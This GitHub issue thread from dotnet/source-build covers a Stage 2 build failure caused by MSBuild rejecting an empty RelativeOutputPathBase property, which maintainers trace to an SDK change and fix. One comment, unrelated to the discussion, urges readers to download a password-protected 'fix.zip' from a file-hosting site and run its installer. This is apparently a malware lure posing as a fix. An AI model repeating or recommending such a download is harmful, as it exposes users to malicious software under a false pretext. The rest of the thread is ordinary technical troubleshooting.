### ISSUE TITLE
VMR Stage2 build fails with `error MSB1006: Property is not valid.`

### ISSUE THREAD

**Issue by Winniexu01** [dotnet/source-build#4579]
[Failing build](https://dev.azure.com/dnceng/internal/_build/results?buildId=2524038&view=logs&j=3121c41d-6088-53a5-4ef6-9a86f3460fe9&t=334539f4-dcef-5cad-a240-02997b3146e7) (internal Microsoft link)

VMR Stage 2 legs are building failed with below message:

      MSBUILD : error MSB1006: Property is not valid.
      Switch: RelativeOutputPathBase
      
      For switch syntax, type "MSBuild -help"
      
      'application-insights' failed during build.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mthalman** [comment]
Not sure why it's complaining about setting an MSBuild property. That is set here: https://github.com/dotnet/source-build-externals/blob/f08c68bfc6c6e065f72e56dcd4dc15d3ea1f43a4/repo-projects/application-insights.proj#L20

Here's the command it's failing on:

`
/vmr/.dotnet/dotnet restore /bl:restore.binlog /vmr/src/source-build-externals/artifacts/sb/src/src/application-insights//BASE/src/Microsoft.ApplicationInsights/Microsoft.ApplicationInsights.csproj /p:Configuration=Release /p:StableRelease=True /p:RelativeOutputPathBase= /v:minimal >> /vmr/src/source-build-externals/artifacts/sb/src/artifacts/bin/application-insights/logs/application-insights.log 2>&1 /p:BinRoot=/vmr/src/source-build-externals/artifacts/sb/src/src/application-insights//bin /p:ObjRoot=/vmr/src/source-build-externals/artifacts/sb/src/src/application-insights//obj /p:PackageOutputDir=/vmr/src/source-build-externals/artifacts/sb/src/src/application-insights//bin/Release  
`

That's identical to the command in stage 1. 

Looking at the [diff of the VMR](https://github.com/dotnet/dotnet/compare/56bbe3aa1a0c671248e028efcb4c23ee0331995a...af97b1c7a5eae2de829ce43f8c3564878944d9f2) comparing when this was working to when this failed, nothing clearly stands out as the culprit. Could it possibly be caused by https://github.com/dotnet/sdk/pull/42240? /cc @baronfel

**Comment by baronfel** [comment]
The only thing I could see that could perhaps be triggering here is [this change](https://github.com/dotnet/sdk/pull/42240/files#diff-35c797ad3a03893b9384dacf3b5cd0b834de1a810d8215381dcb5f9fbf82553dR47) to how we forward 'empty' properties to MSBuild from the CLI. This is an odd property anyway - is there any insight into _why_ it is empty?

**Comment by baronfel** [comment]
cc @rainersigwald for thoughts here on MSBuild property syntax

**Comment by mthalman** [comment]
> This is an odd property anyway - is there any insight into _why_ it is empty?

It's set by default in the application insights source. For source build, we want its value to be cleared. I don't have information on why we need it cleared.

**Comment by baronfel** [comment]
potential workaround might be to set an explicit empty string value via `-p:RelativeOutputPathBase=""`?

**Comment by rainersigwald** [comment]
`/p:RelativeOutputPathBase` with no `=value` is not something we recognize on the MSBuild side, so yeah that change looks wrong to me.

**Comment by baronfel** [comment]
Very odd - there were some tests in the SDK side that didn't pass until I changed that. I'll take a look at getting that fixed soon, then - @rainersigwald I'll ping you on that PR to make sure our understanding of the MSBuild property syntax is correct.

**Comment by mthalman** [comment]
Getting the same error using quotes: [build](https://dev.azure.com/dnceng/internal/_build/results?buildId=2524341&view=results) (internal link)

**Comment by baronfel** [comment]
ok, then we just have to wait until I can force the linked fix through SDK CI (which is being _very_ intransigent on the .NET Framework leg).

**Comment by baronfel** [comment]
Ok, the proposed fix just merged to main in the SDK.

**Comment by Winniexu01** [comment]
Fixed with https://github.com/dotnet/sdk/pull/43004
